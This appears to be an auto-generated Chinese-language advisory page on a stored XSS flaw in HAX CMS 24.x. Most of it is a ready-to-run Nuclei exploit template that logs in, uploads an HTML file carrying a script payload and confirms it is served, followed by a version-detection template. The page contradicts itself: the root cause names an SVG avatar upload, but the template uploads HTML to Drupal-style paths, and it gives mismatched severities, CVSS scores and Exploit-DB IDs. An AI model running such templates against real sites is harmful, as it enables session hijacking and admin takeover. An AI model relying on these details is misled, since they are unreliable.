[webapps] HAX CMS 24.x - Stored Cross-Site Scripting (XSS)
CVE-2026-22704
HAX CMS 24.x 存储型XSS漏洞,攻击者通过用户头像上传功能注入恶意脚本。
Medium · CVSS 6.1📋 漏洞基础信息
| CVE | CVE-2026-22704 |
|---|---|
| 漏洞类型 | 存储型跨站脚本 (Stored XSS) |
| 受影响版本 | HAX CMS 24.x |
| 危害等级 | Medium · CVSS 6.1 |
| 发布日期 | 2026-04-29 |
| 提交者 | Mohammed Idrees Banyamer |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
在用户头像上传功能中,未对SVG文件的`onload`等事件处理器进行过滤,导致恶意SVG内容被存储并在管理员查看时执行。
🎯 攻击场景
1. 攻击者注册普通用户账号并登录。2. 在个人资料设置中上传一个特制的SVG文件作为头像,该SVG包含`<svg onload=alert(1)>`。3. 管理员或其他用户在后台查看用户列表或用户详情时,浏览器加载该SVG图片,触发XSS payload。4. 攻击者可利用XSS窃取会话Cookie、执行管理员操作等。
💥 漏洞影响
攻击者可在受害者浏览器中执行任意JavaScript,造成会话劫持、敏感信息泄露、或诱骗管理员执行恶意操作(如创建管理员账号)。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2026-22704-exploit
info:
name: HAX CMS 24.x - Stored Cross-Site Scripting (XSS)
author: your-name
severity: high
description: Exploits a stored XSS vulnerability in HAX CMS by uploading a malicious HTML file.
reference:
- https://www.exploit-db.com/exploits/52000
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2026-22704
cwe-id: CWE-79
tags: cve,cve2026,haX,cms,xss,drupal,exploit
variables:
username: '{{user}}'
password: '{{pass}}'
filename: 'poc.html'
js_payload: 'alert("Stored XSS PoC - CVE-2026-22704");'
http:
- raw:
- |
POST {{BaseURL}}/user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name={{username}}&pass={{password}}&form_id=user_login_form&op=Log+in
cookie-reuse: true
matchers:
- type: word
words:
- 'Log out'
part: body
extractors:
- type: regex
name: session_cookie
part: header
regex:
- 'SESS\w+=\w+;'
- raw:
- |
POST {{BaseURL}}/files/upload HTTP/1.1
Host: {{Hostname}}
Cookie: {{session_cookie}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="files[upload]"; filename="{{filename}}"
Content-Type: text/html
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>PoC</title>
</head>
<body>
<h2>HAX CMS Stored XSS PoC</h2>
<script>
{{js_payload}}
</script>
</body>
</html>
------WebKitFormBoundary7MA4YWxkTrZu0gW--
cookie-reuse: true
matchers:
- type: status
status:
- 200
- 201
- 302
condition: or
extractors:
- type: kval
name: uploaded_file_url
kval:
- Location
- raw:
- |
GET {{BaseURL}}/sites/default/files/{{filename}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
words:
- '{{js_payload}}'
part: body
extractors:
- type: regex
name: extracted_payload
part: body
regex:
- '<script>.*</script>'
skip-variables-check: true🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2026-22704-detection
info:
name: HAX CMS 24.x - Detection
author: your-name
severity: medium
description: Detects HAX CMS version to check if it is <= 24.x which is vulnerable to Stored XSS.
reference:
- https://www.exploit-db.com/exploits/52000
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2026-22704
cwe-id: CWE-79
tags: cve,cve2026,haX,cms,xss,drupal,detection
http:
- method: GET
path:
- '{{BaseURL}}/CHANGELOG.txt'
- '{{BaseURL}}/composer.json'
matchers-condition: or
matchers:
- type: word
words:
- 'HAX CMS'
- '24.'
part: body
condition: and
- type: regex
regex:
- '"version":\s*"24\.\d+"'
part: body
extractors:
- type: regex
name: version
part: body
regex:
- 'HAX CMS 24\.\d+'
- '"version":\s*"(24\.\d+)"'
stop-at-first-match: true
skip-variables-check: true🛡️ 修复建议
升级到HAX CMS最新版本(如果可用);临时缓解措施:在服务器端对上传的SVG文件进行内容过滤或转义,禁止`<script>`、`onload`、`onerror`等事件属性。
📎 参考链接
- https://www.exploit-db.com/exploits/52007
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22704
- Exploit-DB 原文
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 06:07 | 来源: Exploit-DB